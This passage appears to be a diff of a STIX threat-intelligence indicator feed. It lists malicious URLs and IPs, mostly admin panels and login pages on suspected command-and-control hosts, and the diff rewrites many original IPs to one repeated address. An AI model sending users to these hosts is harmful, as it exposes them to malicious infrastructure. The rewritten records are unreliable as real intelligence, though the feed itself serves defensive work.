http://45.14.50.207/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://45.14.50.207/panel/admin.php']","type":"indicator","valid_from":"2020-01-26T02:55:15.583Z"} +{"created":"2020-01-26T02:55:15.583Z","description":"TS ID: 55256890123; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--0149e0f7-629c-41c5-a1e7-144b3c22d362","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-32"],"modified":"2020-01-26T02:55:15.583Z","name":"mal_url: http://89.160.20.156/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://89.160.20.156/panel/admin.php']","type":"indicator","valid_from":"2020-01-26T02:55:15.583Z"} {"created":"2020-01-26T02:55:15.785Z","description":"TS ID: 55256890140; iType: mal_url; State: active; Org: Global Data Networks LLC; Source: CyberCrime","id":"indicator--751f6e49-92d5-4ff4-9245-870a49dce478","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-86"],"modified":"2020-01-26T02:55:15.785Z","name":"mal_url: http://molmarsl.com/leks/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://molmarsl.com/leks/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-01-26T02:55:15.785Z"} {"created":"2020-01-26T02:55:22.112Z","description":"TS ID: 55256890166; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--e0bdcebe-2f97-4f8f-ad51-0b0c06b5071c","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-86"],"modified":"2020-01-26T02:55:22.112Z","name":"mal_url: http://pecunia110011.at/iteat/","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 
'http://pecunia110011.at/iteat/']","type":"indicator","valid_from":"2020-01-26T02:55:22.112Z"} -{"created":"2020-01-26T02:55:31.348Z","description":"TS ID: 55256890144; iType: mal_url; State: active; Org: Telecommunication Systems, LLC; Source: CyberCrime","id":"indicator--82f02b81-cfae-4bee-b85d-daf900c93936","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-69"],"modified":"2020-01-26T02:55:31.348Z","name":"mal_url: http://188.127.230.249/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://188.127.230.249/login']","type":"indicator","valid_from":"2020-01-26T02:55:31.348Z"} +{"created":"2020-01-26T02:55:31.348Z","description":"TS ID: 55256890144; iType: mal_url; State: active; Org: Telecommunication Systems, LLC; Source: CyberCrime","id":"indicator--82f02b81-cfae-4bee-b85d-daf900c93936","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-69"],"modified":"2020-01-26T02:55:31.348Z","name":"mal_url: http://89.160.20.156/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://89.160.20.156/login']","type":"indicator","valid_from":"2020-01-26T02:55:31.348Z"} {"created":"2020-01-26T02:55:32.119Z","description":"TS ID: 55256890158; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--1e540e5a-6fa3-4758-ab61-0d7692fb3d96","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-82"],"modified":"2020-01-26T02:55:32.119Z","name":"mal_url: http://jor1.berbagsansa.com/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://jor1.berbagsansa.com/login']","type":"indicator","valid_from":"2020-01-26T02:55:32.119Z"} -{"created":"2020-01-26T02:55:33.623Z","description":"TS ID: 55256890152; iType: mal_url; State: active; Org: IT DeLuxe Ltd.; Source: 
CyberCrime","id":"indicator--cbfc3b5d-645b-4114-ab89-7ab5b745d230","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-48"],"modified":"2020-01-26T02:55:33.623Z","name":"mal_url: http://92.63.192.190/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://92.63.192.190/login']","type":"indicator","valid_from":"2020-01-26T02:55:33.623Z"} -{"created":"2020-01-26T02:55:33.646Z","description":"TS ID: 55256890143; iType: mal_url; State: active; Org: Offshore Racks S.A; Source: CyberCrime","id":"indicator--f4cf51da-17db-4d9b-bb65-efeb1373f01b","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-21"],"modified":"2020-01-26T02:55:33.646Z","name":"mal_url: http://190.14.38.202/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://190.14.38.202/login']","type":"indicator","valid_from":"2020-01-26T02:55:33.646Z"} -{"created":"2020-01-26T02:55:33.681Z","description":"TS ID: 55256890162; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--6e4e6382-002d-473a-a635-cc00d4917353","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-67"],"modified":"2020-01-26T02:55:33.681Z","name":"mal_url: http://45.132.104.20/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://45.132.104.20/login']","type":"indicator","valid_from":"2020-01-26T02:55:33.681Z"} +{"created":"2020-01-26T02:55:33.623Z","description":"TS ID: 55256890152; iType: mal_url; State: active; Org: IT DeLuxe Ltd.; Source: CyberCrime","id":"indicator--cbfc3b5d-645b-4114-ab89-7ab5b745d230","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-48"],"modified":"2020-01-26T02:55:33.623Z","name":"mal_url: 
http://89.160.20.156/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://89.160.20.156/login']","type":"indicator","valid_from":"2020-01-26T02:55:33.623Z"} +{"created":"2020-01-26T02:55:33.646Z","description":"TS ID: 55256890143; iType: mal_url; State: active; Org: Offshore Racks S.A; Source: CyberCrime","id":"indicator--f4cf51da-17db-4d9b-bb65-efeb1373f01b","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-21"],"modified":"2020-01-26T02:55:33.646Z","name":"mal_url: http://89.160.20.156/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://89.160.20.156/login']","type":"indicator","valid_from":"2020-01-26T02:55:33.646Z"} +{"created":"2020-01-26T02:55:33.681Z","description":"TS ID: 55256890162; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--6e4e6382-002d-473a-a635-cc00d4917353","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-67"],"modified":"2020-01-26T02:55:33.681Z","name":"mal_url: http://89.160.20.156/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://89.160.20.156/login']","type":"indicator","valid_from":"2020-01-26T02:55:33.681Z"} {"created":"2020-01-26T02:55:33.738Z","description":"TS ID: 55256890138; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--33552aa0-5a5a-47a6-b529-a810dcf8c9af","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-28"],"modified":"2020-01-26T02:55:33.738Z","name":"mal_url: http://aboutworld.info/manage/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://aboutworld.info/manage/admin.php']","type":"indicator","valid_from":"2020-01-26T02:55:33.738Z"} 
-{"created":"2020-01-26T02:55:33.959Z","description":"TS ID: 55256890146; iType: mal_url; State: active; Org: Dzinet Ltd.; Source: CyberCrime","id":"indicator--cd8459e5-367f-46b2-91e7-9893c766091a","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-82"],"modified":"2020-01-26T02:55:33.959Z","name":"mal_url: http://176.113.115.205/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://176.113.115.205/login']","type":"indicator","valid_from":"2020-01-26T02:55:33.959Z"} +{"created":"2020-01-26T02:55:33.959Z","description":"TS ID: 55256890146; iType: mal_url; State: active; Org: Dzinet Ltd.; Source: CyberCrime","id":"indicator--cd8459e5-367f-46b2-91e7-9893c766091a","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-82"],"modified":"2020-01-26T02:55:33.959Z","name":"mal_url: http://89.160.20.156/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://89.160.20.156/login']","type":"indicator","valid_from":"2020-01-26T02:55:33.959Z"} {"created":"2020-01-26T02:55:33.984Z","description":"TS ID: 55256890128; iType: mal_url; State: active; Org: Websitewelcome.com; Source: CyberCrime","id":"indicator--274a9145-93f7-4146-a879-68fce2fc1188","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-84"],"modified":"2020-01-26T02:55:33.984Z","name":"mal_url: http://10121.165-227-83-163.site/admin/","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://10121.165-227-83-163.site/admin/']","type":"indicator","valid_from":"2020-01-26T02:55:33.984Z"} {"created":"2020-01-26T02:55:34.637Z","description":"TS ID: 55256890132; iType: mal_url; State: active; Org: Websitewelcome.com; Source: 
CyberCrime","id":"indicator--ea0abbe1-3033-4549-8ba0-626f43807986","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-83"],"modified":"2020-01-26T02:55:34.637Z","name":"mal_url: http://1926.165-227-83-163.site/admin/","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://1926.165-227-83-163.site/admin/']","type":"indicator","valid_from":"2020-01-26T02:55:34.637Z"} -{"created":"2020-01-26T02:55:44.765Z","description":"TS ID: 55256890120; iType: mal_ip; State: active; Source: CyberCrime","id":"indicator--c7c3a0d7-fccd-4bc0-9011-a6c91f967402","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-76"],"modified":"2020-01-26T02:55:44.765Z","name":"mal_ip: 45.139.236.6","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '45.139.236.6']","type":"indicator","valid_from":"2020-01-26T02:55:44.765Z"} -{"created":"2020-01-26T02:55:48.315Z","description":"TS ID: 55256890150; iType: mal_ip; State: active; Org: IT DeLuxe Ltd.; Source: CyberCrime","id":"indicator--383708ec-c15c-400a-94fc-40d6ac5ab8e3","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-86"],"modified":"2020-01-26T02:55:48.315Z","name":"mal_ip: 92.63.197.185","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '92.63.197.185']","type":"indicator","valid_from":"2020-01-26T02:55:48.315Z"} +{"created":"2020-01-26T02:55:44.765Z","description":"TS ID: 55256890120; iType: mal_ip; State: active; Source: CyberCrime","id":"indicator--c7c3a0d7-fccd-4bc0-9011-a6c91f967402","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-76"],"modified":"2020-01-26T02:55:44.765Z","name":"mal_ip: 89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = 
'89.160.20.156']","type":"indicator","valid_from":"2020-01-26T02:55:44.765Z"} +{"created":"2020-01-26T02:55:48.315Z","description":"TS ID: 55256890150; iType: mal_ip; State: active; Org: IT DeLuxe Ltd.; Source: CyberCrime","id":"indicator--383708ec-c15c-400a-94fc-40d6ac5ab8e3","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-86"],"modified":"2020-01-26T02:55:48.315Z","name":"mal_ip: 89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-01-26T02:55:48.315Z"} {"created":"2020-01-26T02:55:48.35Z","description":"TS ID: 55256890136; iType: mal_url; State: active; Org: GoDaddy.com, LLC; Source: CyberCrime","id":"indicator--14c3d4da-f364-4af0-96ba-ce8959da560b","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-84"],"modified":"2020-01-26T02:55:48.35Z","name":"mal_url: http://185-24-53-218.com/admin/","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://185-24-53-218.com/admin/']","type":"indicator","valid_from":"2020-01-26T02:55:48.35Z"} {"created":"2020-01-26T02:55:58.711Z","description":"TS ID: 55256890133; iType: mal_url; State: active; Org: Websitewelcome.com; Source: CyberCrime","id":"indicator--64655563-a4ad-4097-8cda-68c7bcc461f4","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-86"],"modified":"2020-01-26T02:55:58.711Z","name":"mal_url: http://1410.165-227-83-163.site/admin/","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://1410.165-227-83-163.site/admin/']","type":"indicator","valid_from":"2020-01-26T02:55:58.711Z"} {"created":"2020-01-26T02:56:23.739Z","description":"TS ID: 55256890139; iType: mal_url; State: active; Org: Global Data Networks LLC; Source: 
CyberCrime","id":"indicator--5ab7883f-17c2-4cc7-b854-33f8d4bc6b1e","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-71"],"modified":"2020-01-26T02:56:23.739Z","name":"mal_url: http://nortonlilly.info/geli/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://nortonlilly.info/geli/login.php']","type":"indicator","valid_from":"2020-01-26T02:56:23.739Z"} {"created":"2020-01-26T02:56:23.79Z","description":"TS ID: 55256890131; iType: mal_url; State: active; Org: Websitewelcome.com; Source: CyberCrime","id":"indicator--3417c349-153d-4002-92dd-1093893f3180","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-81"],"modified":"2020-01-26T02:56:23.79Z","name":"mal_url: http://2208.165-227-83-163.site/admin/","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://2208.165-227-83-163.site/admin/']","type":"indicator","valid_from":"2020-01-26T02:56:23.79Z"} -{"created":"2020-01-26T02:56:23.857Z","description":"TS ID: 55256890126; iType: mal_ip; State: active; Org: Websitewelcome.com; Source: CyberCrime","id":"indicator--00ae9f9a-03ce-415c-bb7a-49b6c486ac5d","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-53"],"modified":"2020-01-26T02:56:23.857Z","name":"mal_ip: 96.125.163.13","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '96.125.163.13']","type":"indicator","valid_from":"2020-01-26T02:56:23.857Z"} +{"created":"2020-01-26T02:56:23.857Z","description":"TS ID: 55256890126; iType: mal_ip; State: active; Org: Websitewelcome.com; Source: CyberCrime","id":"indicator--00ae9f9a-03ce-415c-bb7a-49b6c486ac5d","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-53"],"modified":"2020-01-26T02:56:23.857Z","name":"mal_ip: 
89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-01-26T02:56:23.857Z"} {"created":"2020-01-26T02:56:29.981Z","description":"TS ID: 55256890129; iType: mal_url; State: active; Org: Websitewelcome.com; Source: CyberCrime","id":"indicator--dba2c4a2-6ad5-455c-b14a-b437d32ef6a3","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-86"],"modified":"2020-01-26T02:56:29.981Z","name":"mal_url: http://1012.165-227-83-163.site/admin/","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://1012.165-227-83-163.site/admin/']","type":"indicator","valid_from":"2020-01-26T02:56:29.981Z"} {"created":"2020-01-26T02:56:32.609Z","description":"TS ID: 55256890141; iType: mal_url; State: active; Org: H4Y Technologies LLC; Source: CyberCrime","id":"indicator--5049f714-5462-4f8d-8b13-d95024d477ce","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-87"],"modified":"2020-01-26T02:56:32.609Z","name":"mal_url: http://coupondemo.dynamicinnovation.net/ren/index.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://coupondemo.dynamicinnovation.net/ren/index.php']","type":"indicator","valid_from":"2020-01-26T02:56:32.609Z"} {"created":"2020-01-26T02:56:33.504Z","description":"TS ID: 55256890156; iType: mal_url; State: active; Org: OVH SAS; Source: CyberCrime","id":"indicator--b476b4e0-387e-4cc6-8b93-437e05c9099c","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-84"],"modified":"2020-01-26T02:56:33.504Z","name":"mal_url: http://51.38.140.2/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 
'http://51.38.140.2/login']","type":"indicator","valid_from":"2020-01-26T02:56:33.504Z"} {"created":"2020-01-26T02:56:37.688Z","description":"TS ID: 55256890163; iType: mal_url; State: active; Org: DDoS-GUARD GmbH; Source: CyberCrime","id":"indicator--27e994c3-5ee2-4f8b-9fc0-30ca4fc226ab","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-93"],"modified":"2020-01-26T02:56:37.688Z","name":"mal_url: http://baxarex228.xyz/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://baxarex228.xyz/login']","type":"indicator","valid_from":"2020-01-26T02:56:37.688Z"} -{"created":"2020-01-26T02:56:40.17Z","description":"TS ID: 55256890124; iType: mal_ip; State: active; Org: Global Data Networks LLC; Source: CyberCrime","id":"indicator--67020df4-8210-4e8f-afe0-4d44ccd8800d","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-77"],"modified":"2020-01-26T02:56:40.17Z","name":"mal_ip: 185.222.202.91","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '185.222.202.91']","type":"indicator","valid_from":"2020-01-26T02:56:40.17Z"} -{"created":"2020-01-26T02:56:49.862Z","description":"TS ID: 55256890165; iType: mal_ip; State: active; Org: Tencent Building, Kejizhongyi Avenue; Source: CyberCrime","id":"indicator--f57e1196-0c96-4988-89f9-0b9d7301b524","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-83"],"modified":"2020-01-26T02:56:49.862Z","name":"mal_ip: 49.51.171.215","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '49.51.171.215']","type":"indicator","valid_from":"2020-01-26T02:56:49.862Z"} -{"created":"2020-01-26T02:56:49.9Z","description":"TS ID: 55256890154; iType: mal_ip; State: active; Org: OVH SAS; Source: 
CyberCrime","id":"indicator--9797500e-6f8d-444c-bc86-e8e4581de7ce","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-73"],"modified":"2020-01-26T02:56:49.9Z","name":"mal_ip: 51.89.138.152","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '51.89.138.152']","type":"indicator","valid_from":"2020-01-26T02:56:49.9Z"} +{"created":"2020-01-26T02:56:40.17Z","description":"TS ID: 55256890124; iType: mal_ip; State: active; Org: Global Data Networks LLC; Source: CyberCrime","id":"indicator--67020df4-8210-4e8f-afe0-4d44ccd8800d","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-77"],"modified":"2020-01-26T02:56:40.17Z","name":"mal_ip: 89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-01-26T02:56:40.17Z"} +{"created":"2020-01-26T02:56:49.862Z","description":"TS ID: 55256890165; iType: mal_ip; State: active; Org: Tencent Building, Kejizhongyi Avenue; Source: CyberCrime","id":"indicator--f57e1196-0c96-4988-89f9-0b9d7301b524","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-83"],"modified":"2020-01-26T02:56:49.862Z","name":"mal_ip: 89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-01-26T02:56:49.862Z"} +{"created":"2020-01-26T02:56:49.9Z","description":"TS ID: 55256890154; iType: mal_ip; State: active; Org: OVH SAS; Source: CyberCrime","id":"indicator--9797500e-6f8d-444c-bc86-e8e4581de7ce","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-73"],"modified":"2020-01-26T02:56:49.9Z","name":"mal_ip: 
89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-01-26T02:56:49.9Z"} {"created":"2020-01-26T02:56:49.93Z","description":"TS ID: 55256890130; iType: mal_url; State: active; Org: Websitewelcome.com; Source: CyberCrime","id":"indicator--8fb33d6a-4ed9-4c5a-9a8e-d7fc7e77b9d6","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-85"],"modified":"2020-01-26T02:56:49.93Z","name":"mal_url: http://0409.165-227-83-163.site/admin/","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://0409.165-227-83-163.site/admin/']","type":"indicator","valid_from":"2020-01-26T02:56:49.93Z"} {"created":"2020-01-26T02:57:03.544Z","description":"TS ID: 55256890157; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--96012440-e95d-46f0-9b70-3f495f4bab32","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-82"],"modified":"2020-01-26T02:57:03.544Z","name":"mal_url: http://jor1.mirtakala.com/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://jor1.mirtakala.com/login']","type":"indicator","valid_from":"2020-01-26T02:57:03.544Z"} -{"created":"2020-01-26T02:57:10.525Z","description":"TS ID: 55256890151; iType: mal_url; State: active; Org: IT DeLuxe Ltd.; Source: CyberCrime","id":"indicator--707777c2-d621-4fc8-a44b-6ee28a712ff6","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-86"],"modified":"2020-01-26T02:57:10.525Z","name":"mal_url: http://92.63.197.185/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://92.63.197.185/login']","type":"indicator","valid_from":"2020-01-26T02:57:10.525Z"} +{"created":"2020-01-26T02:57:10.525Z","description":"TS ID: 
55256890151; iType: mal_url; State: active; Org: IT DeLuxe Ltd.; Source: CyberCrime","id":"indicator--707777c2-d621-4fc8-a44b-6ee28a712ff6","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-86"],"modified":"2020-01-26T02:57:10.525Z","name":"mal_url: http://89.160.20.156/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://89.160.20.156/login']","type":"indicator","valid_from":"2020-01-26T02:57:10.525Z"} {"created":"2020-01-26T02:57:10.571Z","description":"TS ID: 55256890135; iType: mal_url; State: active; Org: Global Data Networks LLC; Source: CyberCrime","id":"indicator--275f3354-1d9c-4167-9f1a-abb06bb0f138","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-88"],"modified":"2020-01-26T02:57:10.571Z","name":"mal_url: http://pnumbrero3.ru/soft/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://pnumbrero3.ru/soft/panel/admin.php']","type":"indicator","valid_from":"2020-01-26T02:57:10.571Z"} {"created":"2020-01-26T02:57:14.057Z","description":"TS ID: 55256890127; iType: mal_url; State: active; Org: Websitewelcome.com; Source: CyberCrime","id":"indicator--b449e457-5327-40a2-8bda-0167c219490c","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-83"],"modified":"2020-01-26T02:57:14.057Z","name":"mal_url: http://10122.165-227-83-163.site/admin/","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://10122.165-227-83-163.site/admin/']","type":"indicator","valid_from":"2020-01-26T02:57:14.057Z"} {"created":"2020-01-26T02:57:26.003Z","description":"TS ID: 55256890125; iType: mal_url; State: active; Org: Websitewelcome.com; Source: 
CyberCrime","id":"indicator--c8559f01-42c4-42f1-8464-e2e2e2af84d0","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-86"],"modified":"2020-01-26T02:57:26.003Z","name":"mal_url: http://10123.165-227-83-163.site/admin/","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://10123.165-227-83-163.site/admin/']","type":"indicator","valid_from":"2020-01-26T02:57:26.003Z"} 
@@ -155,8 +155,8 @@ {"created":"2020-01-27T02:55:38.721Z","description":"TS ID: 55259870761; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime","id":"indicator--ce0e3226-1587-4fd1-bdd0-aa76c548e8df","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-75"],"modified":"2020-01-27T02:55:38.721Z","name":"mal_url: http://dufres.site/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://dufres.site/login']","type":"indicator","valid_from":"2020-01-27T02:55:38.721Z"} {"created":"2020-01-27T02:55:45.512Z","description":"TS ID: 55259870706; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime","id":"indicator--9c90ff74-a454-49c7-afa8-1339915ceac8","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-91"],"modified":"2020-01-27T02:55:45.512Z","name":"mal_url: http://mogut3.site/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://mogut3.site/login']","type":"indicator","valid_from":"2020-01-27T02:55:45.512Z"} {"created":"2020-01-27T02:55:48.012Z","description":"TS ID: 55259870655; iType: mal_url; State: active; Org: OVH Hosting; Source: CyberCrime","id":"indicator--15806179-df3f-450a-baf5-8e2a29d87faa","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-83"],"modified":"2020-01-27T02:55:48.012Z","name":"mal_url: http://vidar321.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://vidar321.ru/login']","type":"indicator","valid_from":"2020-01-27T02:55:48.012Z"} -{"created":"2020-01-27T02:55:50.673Z","description":"TS ID: 55259870822; iType: mal_url; State: active; Org: Friendhosting LTD; Source: 
CyberCrime","id":"indicator--bc1b9793-42ef-41bf-a370-a68ca5dd8c7f","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-75"],"modified":"2020-01-27T02:55:50.673Z","name":"mal_url: http://91.90.192.161/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://91.90.192.161/login']","type":"indicator","valid_from":"2020-01-27T02:55:50.673Z"} -{"created":"2020-01-27T02:56:02.067Z","description":"TS ID: 55259870657; iType: mal_url; State: active; Org: Transit Telecom LLC; Source: CyberCrime","id":"indicator--d4d45888-5dfb-463b-8d5c-9871157397f9","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-17"],"modified":"2020-01-27T02:56:02.067Z","name":"mal_url: http://95.181.178.210/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://95.181.178.210/login']","type":"indicator","valid_from":"2020-01-27T02:56:02.067Z"} +{"created":"2020-01-27T02:55:50.673Z","description":"TS ID: 55259870822; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime","id":"indicator--bc1b9793-42ef-41bf-a370-a68ca5dd8c7f","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-75"],"modified":"2020-01-27T02:55:50.673Z","name":"mal_url: http://89.160.20.156/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://89.160.20.156/login']","type":"indicator","valid_from":"2020-01-27T02:55:50.673Z"} +{"created":"2020-01-27T02:56:02.067Z","description":"TS ID: 55259870657; iType: mal_url; State: active; Org: Transit Telecom LLC; Source: CyberCrime","id":"indicator--d4d45888-5dfb-463b-8d5c-9871157397f9","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-17"],"modified":"2020-01-27T02:56:02.067Z","name":"mal_url: 
